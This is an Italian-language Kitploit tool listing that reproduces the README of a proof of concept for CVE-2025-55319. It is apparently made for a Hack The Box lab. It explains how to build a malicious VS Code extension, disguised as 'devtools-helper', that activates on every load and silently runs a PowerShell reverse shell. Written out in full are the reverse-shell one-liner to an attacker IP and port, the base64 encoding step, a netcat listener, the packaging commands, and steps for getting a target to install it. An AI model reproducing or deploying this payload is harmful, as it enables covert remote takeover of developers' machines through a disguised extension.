Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55319-PoC — PoC per CVE-2025-55319 | Kitploit
Strumenti/GitHubGitHub/nephila016/cve-2025-55319-poc
ExploitCTFCommand and ControlIngegneria SocialeRed TeamingStrumento di Accesso RemotoSviluppo PayloadLab e Pratica
GitHubnephila016/cve-2025-55319-poc

CVE-2025-55319-PoC

PoC per CVE-2025-55319

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Riferimento: CVE-2025-55319

Estensione proof-of-concept per VS Code (.vsix) per la challenge HTB "Checkpoint". Una volta installata, l'estensione si attiva automaticamente e genera una reverse shell PowerShell nascosta verso l'attaccante.

⚠️ Solo uso autorizzato. Questo è un artefatto CTF/lab. Distribuiscilo solo su macchine di tua proprietà o per le quali hai esplicitamente l'autorizzazione al test (es. una macchina target HTB).


Come funziona

  • extension/package.json — manifest dell'estensione. "activationEvents": ["*"] fa sì che venga eseguito non appena VS Code si carica, senza interazione dell'utente.
  • extension/extension.js — su activate(), esegue un payload PowerShell con codifica base64 con -WindowStyle Hidden -NoProfile per una reverse shell silenziosa.
  • [Content_Types].xml — manifest dei tipi di contenuto OpenXML in modo che la cartella possa essere zippata in un pacchetto .vsix valido.

Struttura

root@kitploit:~
.
├── [Content_Types].xml     # VSIX content-type manifest
└── extension/
    ├── package.json        # extension manifest (activates on "*")
    └── extension.js        # reverse-shell payload

Utilizzo

1. Costruisci il tuo payload

Genera una reverse shell PowerShell in base64 (UTF-16LE) puntando alla tua macchina attaccante:

root@kitploit:~
LHOST=10.10.15.158
LPORT=4443
PS="\$c=New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){\$d=(New-Object System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=(iex \$d 2>&1|Out-String);\$sb=([text.encoding]::ASCII).GetBytes(\$r+'PS> ');\$s.Write(\$sb,0,\$sb.Length);\$s.Flush()}"
echo -n "$PS" | iconv -t UTF-16LE | base64 -w0

Incolla l'output sopra YOUR_BASE64_PAYLOAD_HERE in extension/extension.js:

root@kitploit:~
const payload = '<base64-blob-here>'

2. Avvia il tuo listener

root@kitploit:~
nc -lvnp 4443

3. Impacchetta in un .vsix

Un .vsix è semplicemente un ZIP con la cartella extension/ più il manifest nella root:

root@kitploit:~
# from this directory
zip -r devtools-helper.vsix extension "[Content_Types].xml"

4. Consegna e attiva

Fai installare l'estensione al target. Puoi:

  • CLI: code --install-extension devtools-helper.vsix
  • GUI: Visualizza estensioni → menu ··· → Installa da VSIX…

Al successivo avvio di VS Code (o subito dopo l'installazione), l'evento di attivazione * scatta, il payload viene eseguito e il tuo listener riceve la shell.

root@kitploit:~
$ nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.15.158] from ...
PS>

Pulizia

Rimuovi l'estensione dal target al termine:

root@kitploit:~
code --uninstall-extension devtools.devtools-helper

Note

  • Il payload ha come target Windows (PowerShell). Modifica extension.js per altre piattaforme.
  • os è importato in extension.js ma non utilizzato — utile se vuoi creare rami basati su os.platform() per supportare target Linux/macOS.
  • Incrementa la versione in package.json tra una build e l'altra se reimpacchetti.
Scarica lo strumento